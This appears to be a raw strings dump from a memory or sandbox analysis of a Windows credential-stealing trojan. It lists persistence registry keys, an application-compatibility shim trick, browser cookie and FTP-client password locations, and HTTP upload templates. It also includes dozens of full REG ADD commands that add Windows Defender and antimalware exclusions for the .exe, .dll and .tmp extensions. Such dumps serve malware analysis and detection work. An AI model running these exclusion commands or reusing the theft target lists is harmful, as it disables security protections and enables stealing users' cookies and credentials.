ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
kernel32.dll
kernel32.dll
ExitWindowsEx
ExitWindowsEx
user32.dll
user32.dll
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
advapi32.dll
advapi32.dll
modules.dll
modules.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
\\.\pipe\
\\.\pipe\
VWRQRh.exe
VWRQRh.exe
h.exe
h.exe
ws2_32.dll
ws2_32.dll
RegCreateKeyExA
RegCreateKeyExA
ShellExecuteA
ShellExecuteA
gdi32.dll
gdi32.dll
ole32.dll
ole32.dll
rmnsoft.dll
rmnsoft.dll
google.com:80
google.com:80
bing.com:80
bing.com:80
yahoo.com:80
yahoo.com:80
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
Windows Defender
Software\Microsoft\Windows\CurrentVersion\Policies
Software\Microsoft\Windows\CurrentVersion\Policies
Software\Microsoft\Windows\CurrentVersion\Policies\Associations
Software\Microsoft\Windows\CurrentVersion\Policies\Associations
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\CurrentVersion\policies\system
\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
"ntdll.dll
"ntdll.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
\\.\131D2408D44C4f47AC647AB96987D4D5
\\.\131D2408D44C4f47AC647AB96987D4D5
\Google\Chrome\User Data\Default\Cookies
\Google\Chrome\User Data\Default\Cookies
\Google\Chrome\User Data\Default\Extension Cookies
\Google\Chrome\User Data\Default\Extension Cookies
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
%APPDATA%\Mozilla\Firefox\
%APPDATA%\Mozilla\Firefox\
%WinDir%\Application Data\Mozilla\Firefox\
%WinDir%\Application Data\Mozilla\Firefox\
profiles.ini
profiles.ini
Profile%d
Profile%d
\cookies.txt
\cookies.txt
\cookies.sqlite
\cookies.sqlite
%APPDATA%\Opera\
%APPDATA%\Opera\
\profile\cookies4.dat
\profile\cookies4.dat
\cookies4.dat
\cookies4.dat
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
FireFox Cookies\Profile %d\cookies.txt
FireFox Cookies\Profile %d\cookies.txt
FireFox Cookies\Profile %d\cookies.sqlite
FireFox Cookies\Profile %d\cookies.sqlite
Chrome\Cookies
Chrome\Cookies
Chrome\Extension Cookies
Chrome\Extension Cookies
Opera\Profile %d\cookies4.dat
Opera\Profile %d\cookies4.dat
Safari\Cookies.plist
Safari\Cookies.plist
1etexec
1etexec
complete.dat
complete.dat
SRQVWh.exe
SRQVWh.exe
h.exeVj
h.exeVj
h.exeh$~
h.exeh$~
tvh.exe
tvh.exe
PSSSSSSh
PSSSSSSh
More information: hXXp://VVV.ibsensoftware.com/
More information: hXXp://VVV.ibsensoftware.com/
Advapi32.dll
Advapi32.dll
RegDeleteKeyExA
RegDeleteKeyExA
com.%s.sdb
com.%s.sdb
%s\cmd.%s.bat
%s\cmd.%s.bat
start "" "%s"
start "" "%s"
"%%windir%%\%s\iscsicli.exe"
"%%windir%%\%s\iscsicli.exe"
/q "%s"
/q "%s"
\system32\sdbinst.exe"
\system32\sdbinst.exe"
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe\
\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb
\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb
/q /u "%s"
/q /u "%s"
SOFTWARE\Microsoft\Windows NT\CurrentVersion\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\
SOFTWARE\Microsoft\Updates\Windows XP\SP4
SOFTWARE\Microsoft\Updates\Windows XP\SP4
SOFTWARE\Microsoft\Updates\Windows XP\SP3
SOFTWARE\Microsoft\Updates\Windows XP\SP3
SOFTWARE\Microsoft\Updates\Windows XP\SP10
SOFTWARE\Microsoft\Updates\Windows XP\SP10
SOFTWARE\Microsoft\Updates\Windows XP\SP0
SOFTWARE\Microsoft\Updates\Windows XP\SP0
SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages
SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages
:Zone.Identifier:$DATA
:Zone.Identifier:$DATA
:Zone.Identifier
:Zone.Identifier
svchost.exe
svchost.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
spoolsv.exe
spoolsv.exe
..\p.exe
..\p.exe
CheckBypassed ok
CheckBypassed ok
loader.exe
loader.exe
_CheckBypassed@0
_CheckBypassed@0
|GetWindowsDirectoryA
|GetWindowsDirectoryA
\/{X-X-X-X-XX}
\/{X-X-X-X-XX}
|ZwDelayExecution
|ZwDelayExecution
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles%\Internet Explorer\iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
http\shell\open\command
http\shell\open\command
chrome.exe
chrome.exe
opera.exe
opera.exe
cmd.exe
cmd.exe
/C ""%s"" %s
/C ""%s"" %s
/C ""%s""
/C ""%s""
user32.DLL
user32.DLL
p.exe
p.exe
Rapport
Rapport
1onsent.exe
1onsent.exe
&.bAp
&.bAp
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\p.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\p.exe
GetProcessHeap
GetProcessHeap
RegEnumKeyA
RegEnumKeyA
RegOpenKeyA
RegOpenKeyA
ShellExecuteExA
ShellExecuteExA
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHook
UnhookWindowsHook
EnumWindows
EnumWindows
.rdata
.rdata
.rsrc
.rsrc
PF8-.XU
PF8-.XU
O3$dS7"%U9
O3$dS7"%U9
KERNEL32.DLL
KERNEL32.DLL
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
2.1.0.3
2.1.0.3
iscsicli.exe
iscsicli.exe
RedirectEXE
RedirectEXE
%temp%\..\..\LocalLow\cmd.%username%.bat
%temp%\..\..\LocalLow\cmd.%username%.bat
emsseces.exe
emsseces.exe
svchost.exe_1512_rwx_20010000_00001000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
svchost.exe_1512_rwx_20021000_0000D000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
h.exe
h.exe
{X-X-X-X-XX}
{X-X-X-X-XX}
\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
"ntdll.dll
"ntdll.dll
kernel32.dll
kernel32.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
advapi32.dll
advapi32.dll
\AVG\AVG2013\avgui.exe
\AVG\AVG2013\avgui.exe
\AVAST Software\Avast\AvastUI.exe
\AVAST Software\Avast\AvastUI.exe
\ESET\ESET NOD32 Antivirus\egui.exe
\ESET\ESET NOD32 Antivirus\egui.exe
*.exe
*.exe
\Bitdefender\Bitdefender 2013\seccenter.exe
\Bitdefender\Bitdefender 2013\seccenter.exe
\uiStub.exe
\uiStub.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\wyxhmtka.log
%Documents and Settings%\%current user%\Local Settings\Application Data\wyxhmtka.log
GetWindowsDirectoryA
GetWindowsDirectoryA
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ShellExecuteA
ShellExecuteA
ExitWindowsEx
ExitWindowsEx
.text
.text
.rdata
.rdata
@.data
@.data
.reloc
.reloc
{X-4
{X-4
Windows\CurrentVersion\Un
Windows\CurrentVersion\Un
api.SHD:
api.SHD:
eKeyA
eKeyA
XM%S_O;
XM%S_O;
svchost.exe_1512_rwx_20031000_00011000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
kernel32.dll
kernel32.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
advapi32.dll
advapi32.dll
wshell32.dll
wshell32.dll
\Google\Chrome\User Data\Default\Cookies
\Google\Chrome\User Data\Default\Cookies
\Google\Chrome\User Data\Default\Extension Cookies
\Google\Chrome\User Data\Default\Extension Cookies
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
%APPDATA%\Mozilla\Firefox\
%APPDATA%\Mozilla\Firefox\
%WinDir%\Application Data\Mozilla\Firefox\
%WinDir%\Application Data\Mozilla\Firefox\
profiles.ini
profiles.ini
Profile%d
Profile%d
\cookies.txt
\cookies.txt
\cookies.sqlite
\cookies.sqlite
%APPDATA%\Opera\
%APPDATA%\Opera\
\profile\cookies4.dat
\profile\cookies4.dat
\cookies4.dat
\cookies4.dat
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
FireFox Cookies\Profile %d\cookies.txt
FireFox Cookies\Profile %d\cookies.txt
FireFox Cookies\Profile %d\cookies.sqlite
FireFox Cookies\Profile %d\cookies.sqlite
Chrome\Cookies
Chrome\Cookies
Chrome\Extension Cookies
Chrome\Extension Cookies
Opera\Profile %d\cookies4.dat
Opera\Profile %d\cookies4.dat
Safari\Cookies.plist
Safari\Cookies.plist
GetWindowsDirectoryA
GetWindowsDirectoryA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegOpenKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegCloseKey
RegCloseKey
ExitWindowsEx
ExitWindowsEx
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
{X-
{X-
eKeyA
eKeyA
s^.exe
s^.exe
svchost.exe_1512_rwx_20051000_00011000:
0WSSh
0WSSh
h.log
h.log
%USERPROFILE%
%USERPROFILE%
Kernel32.dll
Kernel32.dll
%s %s %s: %s:%d
%s %s %s: %s:%d
GetWindowsDirectoryA
GetWindowsDirectoryA
GetProcessHeap
GetProcessHeap
PeekNamedPipe
PeekNamedPipe
.text
.text
`.rdata
`.rdata
@.data
@.data
.idata
.idata
.reloc
.reloc
ernel32.dllS.
ernel32.dllS.
ls.EnW
ls.EnW
m.div
m.div
svchost.exe_1512_rwx_20071000_000A0000:
i
i
.iniu>
.iniu>
.exeuZH
.exeuZH
=.datuLh
=.datuLh
Q=.bpsuLh
Q=.bpsuLh
.xmluIh
.xmluIh
t%SVP
t%SVP
.iniu
.iniu
.prfu1
.prfu1
h.log
h.log
Q.Rjv
Q.Rjv
H.Qjv
H.Qjv
#$%&'()* ,--
#$%&'()* ,--
-4-4--567
-4-4--567
s%j.Zf
s%j.Zf
j%Xf;
j%Xf;
>%u[f
>%u[f
FtpControl
FtpControl
32bit FTP
32bit FTP
LeapFtp
LeapFtp
SoftFx FTP
SoftFx FTP
ClassicFTP
ClassicFTP
WebSitePublisher
WebSitePublisher
FtpExplorer
FtpExplorer
Core ftp
Core ftp
Coffee cup ftp
Coffee cup ftp
FFFtp
FFFtp
TurboFtp
TurboFtp
SmartFtp
SmartFtp
BulletproofFTP
BulletproofFTP
FtpCommander
FtpCommander
Cute FTP
Cute FTP
WS FTP
WS FTP
Windows/Total commander
Windows/Total commander
PTF://
PTF://
Password
Password
password
password
FtpIniName
FtpIniName
\Ipswitch\WS_FTP Home\Sites
\Ipswitch\WS_FTP Home\Sites
\Ipswitch\WS_FTP\Sites
\Ipswitch\WS_FTP\Sites
\%.d.0
\%.d.0
Quick.dat
Quick.dat
port
port
sitemanager.xml
sitemanager.xml
Port
Port
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
History.dat
History.dat
Favorites.dat
Favorites.dat
\Frigate3\FtpSite.XML
\Frigate3\FtpSite.XML
\sites.xml
\sites.xml
\FTPRush\RushSite.xml
\FTPRush\RushSite.xml
SET PASS
SET PASS
NODE: TYPE = FTP
NODE: TYPE = FTP
\BitKinex\bitkinex.ds
\BitKinex\bitkinex.ds
_Password
_Password
FtpUserName
FtpUserName
FtpServer
FtpServer
FtpDirectory
FtpDirectory
FtpDescription
FtpDescription
_FtpPassword
_FtpPassword
SELECT ServerName, Url, ServerUser, ServerPass, RemoteDir FROM "TServers"
SELECT ServerName, Url, ServerUser, ServerPass, RemoteDir FROM "TServers"
SharedSettings.ccs
SharedSettings.ccs
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
sites.dat
sites.dat
LeapFTP
LeapFTP
HostPassword
HostPassword
\32BitFtp.ini
\32BitFtp.ini
PassWord
PassWord
%USERPROFILE%
%USERPROFILE%
Kernel32.dll
Kernel32.dll
sql_trace
sql_trace
sqlite_version
sqlite_version
sqlite_rename_trigger
sqlite_rename_trigger
sqlite_rename_table
sqlite_rename_table
RowKey
RowKey
SQLite format 3
SQLite format 3
CREATE TABLE sqlite_master(
CREATE TABLE sqlite_master(
sql text
sql text
CREATE TEMP TABLE sqlite_temp_master(
CREATE TEMP TABLE sqlite_temp_master(
ABORTABLEFTEMPORARYADDATABASELECTHENDEFAULTRANSACTIONATURALTERAISEACHECKEYAFTEREFERENCESCAPELSEXCEPTRIGGEREGEXPLAINITIALLYANALYZEXCLUSIVEXISTSTATEMENTANDEFERRABLEATTACHAVINGLOBEFOREIGNOREINDEXAUTOINCREMENTBEGINNERENAMEBETWEENOTNULLIKEBYCASCADEFERREDELETECASECASTCOLLATECOLUMNCOMMITCONFLICTCONSTRAINTERSECTCREATECROSSCURRENT_DATECURRENT_TIMESTAMPLANDESCDETACHDISTINCTDROPRAGMATCHFAILIMITFROMFULLGROUPDATEIFIMMEDIATEINSERTINSTEADINTOFFSETISNULLJOINORDEREPLACEOUTERESTRICTPRIMARYQUERYRIGHTROLLBACKROWHENUNIONUNIQUEUSINGVACUUMVALUESVIEWHEREVIRTUAL
ABORTABLEFTEMPORARYADDATABASELECTHENDEFAULTRANSACTIONATURALTERAISEACHECKEYAFTEREFERENCESCAPELSEXCEPTRIGGEREGEXPLAINITIALLYANALYZEXCLUSIVEXISTSTATEMENTANDEFERRABLEATTACHAVINGLOBEFOREIGNOREINDEXAUTOINCREMENTBEGINNERENAMEBETWEENOTNULLIKEBYCASCADEFERREDELETECASECASTCOLLATECOLUMNCOMMITCONFLICTCONSTRAINTERSECTCREATECROSSCURRENT_DATECURRENT_TIMESTAMPLANDESCDETACHDISTINCTDROPRAGMATCHFAILIMITFROMFULLGROUPDATEIFIMMEDIATEINSERTINSTEADINTOFFSETISNULLJOINORDEREPLACEOUTERESTRICTPRIMARYQUERYRIGHTROLLBACKROWHENUNIONUNIQUEUSINGVACUUMVALUESVIEWHEREVIRTUAL
f){-.gBsu1Z2^
f){-.gBsu1Z2^
3.3.14
3.3.14
Ad-d-d d:d:d
Ad-d-d d:d:d
d:d:d
d:d:d
d-d-d
d-d-d
M@d
M@d
2147483647
2147483647
%s\etilqs_
%s\etilqs_
Outstanding page count goes from %d to %d during this analysis
Outstanding page count goes from %d to %d during this analysis
Pointer map page %d is referenced
Pointer map page %d is referenced
Page %d is never used
Page %d is never used
Unable to malloc %d bytes
Unable to malloc %d bytes
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
Failed to read ptrmap key=%d
freelist leaf count too big on page %d
freelist leaf count too big on page %d
failed to get page %d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
%d of %d pages missing from overflow list starting at %d
2nd reference to page %d
2nd reference to page %d
invalid page number %d
invalid page number %d
Fragmented space is %d byte reported as %d on page %d
Fragmented space is %d byte reported as %d on page %d
Multiple uses for byte %d of page %d
Multiple uses for byte %d of page %d
Corruption detected in cell %d on page %d
Corruption detected in cell %d on page %d
On page %d at right child:
On page %d at right child:
On tree page %d cell %d:
On tree page %d cell %d:
initPage() returns error code %d
initPage() returns error code %d
unable to get the page. error code=%d
unable to get the page. error code=%d
Page %d:
Page %d:
%s(%d)
%s(%d)
keyinfo(%d
keyinfo(%d
%s-mjX
%s-mjX
Aunable to use function %s in the requested context
Aunable to use function %s in the requested context
Unsupported module operation: xNext
Unsupported module operation: xNext
Unsupported module operation: xColumn
Unsupported module operation: xColumn
Unsupported module operation: xRowid
Unsupported module operation: xRowid
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s
sqlite_master
sqlite_master
sqlite_temp_master
sqlite_temp_master
transaction - SQL statements in progress
transaction - SQL statements in progress
variable number must be between ?1 and ?%d
variable number must be between ?1 and ?%d
not authorized to use function: %s
not authorized to use function: %s
ambiguous column name: %s
ambiguous column name: %s
no such column: %s
no such column: %s
%.*s%Q%s
%.*s%Q%s
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q
sqlite_sequence
sqlite_sequence
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name, %d 18,10) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name, %d 18,10) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
table %s may not be altered
table %s may not be altered
sqlite_
sqlite_
there is already another table or index with this name: %s
there is already another table or index with this name: %s
%s OR name=%Q
%s OR name=%Q
UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d,length(sql)) WHERE type = 'table' AND name = %Q
UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d,length(sql)) WHERE type = 'table' AND name = %Q
Cannot add a PRIMARY KEY column
Cannot add a PRIMARY KEY column
DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q
DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q
CREATE TABLE %Q.sqlite_stat1(tbl,idx,stat)
CREATE TABLE %Q.sqlite_stat1(tbl,idx,stat)
sqlite_stat1
sqlite_stat1
SELECT idx, stat FROM %Q.sqlite_stat1
SELECT idx, stat FROM %Q.sqlite_stat1
sqlite_detach
sqlite_detach
sqlite_attach
sqlite_attach
unable to open database: %s
unable to open database: %s
database %s is already in use
database %s is already in use
too many attached databases - max %d
too many attached databases - max %d
database %s is locked
database %s is locked
cannot detach database %s
cannot detach database %s
no such database: %s
no such database: %s
%s %T cannot reference objects in database %s
%s %T cannot reference objects in database %s
access to %s.%s is prohibited
access to %s.%s is prohibited
access to %s.%s.%s is prohibited
access to %s.%s.%s is prohibited
illegal return value (%d) from the authorization function - should be SQLITE_OK, SQLITE_IGNORE, or SQLITE_DENY
illegal return value (%d) from the authorization function - should be SQLITE_OK, SQLITE_IGNORE, or SQLITE_DENY
no such table: %s
no such table: %s
no such table: %s.%s
no such table: %s.%s
object name reserved for internal use: %s
object name reserved for internal use: %s
there is already an index named %s
there is already an index named %s
duplicate column name: %s
duplicate column name: %s
default value of column [%s] is not constant
default value of column [%s] is not constant
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
table "%s" has more than one primary key
table "%s" has more than one primary key
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE TABLE %Q.sqlite_sequence(name,seq)
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#0, sql=%Q WHERE rowid=#1
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#0, sql=%Q WHERE rowid=#1
CREATE %s %.*s
CREATE %s %.*s
view %s is circularly defined
view %s is circularly defined
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %s.sqlite_sequence WHERE name=%Q
